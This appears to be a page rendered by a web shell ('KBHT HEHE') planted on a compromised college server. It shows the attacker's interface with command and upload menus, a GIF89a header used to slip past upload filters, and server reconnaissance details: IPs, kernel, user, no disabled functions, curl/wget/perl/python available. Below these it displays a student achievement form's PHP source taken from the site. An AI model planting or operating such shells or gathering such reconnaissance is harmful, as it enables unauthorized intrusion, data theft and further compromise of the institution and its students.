GIF89a; CRX
KBHT HEHE
Server IP : 172.26.0.195  /  Your IP : 3.144.31.17
Web Server : Apache
System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : jnclnmuac ( 1026)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jnclnmuac/public_html/web/../admission/../cas/application/views/student/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jnclnmuac/public_html/web/../admission/../cas/application/views/student/createAchievement.php
<!DOCTYPE HTML>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <title>Add New Achievement| <?php echo $this->session->userdata("studentData")["branch_short_name"]; ?> | College Automation System</title>
        <link rel="stylesheet" href="<?php echo base_url("assets/admin/css/style.css"); ?>">
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Nunito:300,400,600,700,800,900&amp;display=swap">
        <link rel="image icon" href="<?php echo base_url("assets/admin/images/logo.png"); ?>">
        <script src="<?php echo base_url("assets/admin/js/jquery-1.10.2.min.js"); ?>"></script>
        <script src="<?php echo base_url("assets/admin/js/bootstrap.min.js"); ?>"></script>
    </head>
    <body>
        <div class="se-pre-con"></div>
        <section>
            <?php $this->load->view("student/navAndHeader"); ?>
            <div class="main-content">
                <div class="container-fluid content-top-gap">
                    <nav aria-label="breadcrumb">
                        <ol class="breadcrumb my-breadcrumb">
                            <li class="breadcrumb-item"><a href="<?php echo site_url("student/Dashboard"); ?>">Home</a></li>
                            <li class="breadcrumb-item active" aria-current="page"><a href="<?php echo site_url("student/Profile/myAchievements"); ?>">My Achievements</a></li>
                            <li class="breadcrumb-item active" aria-current="page"><a href="<?php echo site_url("student/Profile/createAchievement"); ?>">Add New Achievement</a></li>
                        </ol>
                    </nav>
                    <section class="forms">
                        <div class="card card_border py-2 mb-4">
                            <div class="cards__heading">
                                <h3><i class="fa fa-plus"></i> Add New Achievement </h3>
                            </div>
                            <div class="card-body">
                                <?php if (validation_errors() != false) { ?>
                                    <div class="alert alert-danger"> <strong><?php echo validation_errors(); ?></strong> </div>
                                <?php } ?>
                                <?php if ($this->session->flashdata('successMessage')) { ?>
                                    <div class="alert alert-success"> <strong><?php echo $this->session->flashdata('successMessage'); ?> </strong> </div>
                                <?php } ?>
                                <?php if ($this->session->flashdata('errorMessage')) { ?>
                                    <div class="alert alert-danger"> <strong><?php echo $this->session->flashdata('errorMessage'); ?></strong> </div>
                                <?php } ?>
                                <?php echo form_open_multipart(site_url('student/Profile/saveNewAchievement'), ['name' => 'achievementCreationFrm', 'id' => 'achievementCreationFrm']); ?>
                                <fieldset>
                                    <legend>Enter Achievement Info</legend>
                                    <div class="form-row">
                                        <div class="form-group col-md-12">
                                            <label for="achvTitle" class="input__label">Title *</label>
                                            <input type="text" class="form-control input-style" id="achvTitle" name="achvTitle" value="<?php echo set_value('achvTitle'); ?>" placeholder="Enter Your Achievement Title" maxlength="200">
                                        </div>
                                    </div>
                                    <div class="form-row">
                                        <div class="form-group col-md-6">
                                            <label for="achvHead" class="input__label">Achievement Type/Head *</label>
                                            <select id="achvHead" name="achvHead" class="form-control input-style">
                                                <option value="" <?php echo set_select("achvHead", ""); ?>>Achievement Type/Head *</option>
                                                <?php foreach ($achievementHeads as $achvHeads) { ?>
                                                    <option value="<?php echo $achvHeads->tsam_id; ?>" <?php echo set_select("achvHead", $achvHeads->tsam_id); ?>><?php echo stripslashes($achvHeads->tsam_short_title); ?></option>
                                                <?php }
                                                ?>
                                            </select>
                                        </div>
                                        <div class="form-group col-md-6">
                                            <label for="session" class="input__label">Session *</label>
                                            <select id="session" name="session" class="form-control input-style">
                                                <option value="" <?php echo set_select("session", ""); ?>>Select Session</option>
                                                <?php foreach ($sessions as $session) { ?>
                                                    <option value="<?php echo $session->session_id; ?>" <?php echo set_select("session", $session->session_id); ?>><?php echo stripslashes($session->session_name); ?></option>
                                                <?php }
                                                ?>
                                            </select>
                                        </div>
                                    </div>
                                    <div class="form-row">
                                        <div class="form-group col-md-12">
                                            <label for="achvDesc" class="input__label">Description *</label>
                                            <textarea class="form-control input-style" name="achvDesc" id="achvDesc" placeholder="Describe Your Achievement In Brief (Max. 1000 Chars)" maxlength="1000"><?php echo set_value('achvDesc'); ?></textarea>
                                        </div>
                                    </div>
                                    <div class="form-row">
                                        <div class="form-group col-md-12">
                                            <label for="achvFile" class="input__label">File (Optional)</label>
                                            <input type="file" class="form-control input-style" id="achvFile" name="achvFile">
                                            <small id="achvFileInstruction" class="form-text text-muted"><b>Max. Upload Size 2 MB. Allowed Extension : *.pdf. Upload Supporting Document/Certificate (If Any).</b></small>
                                        </div>
                                    </div>
                                </fieldset>
                                <button type="submit" class="btn btn-primary btn-block btn-style mt-4">Submit</button>
                                <?php echo form_close(); ?>
                            </div>
                        </div>
                    </section>
                </div>
            </div>
        </section>
        <?php $this->load->view("student/footer"); ?>
    </body>
</html>

KBHT - 2023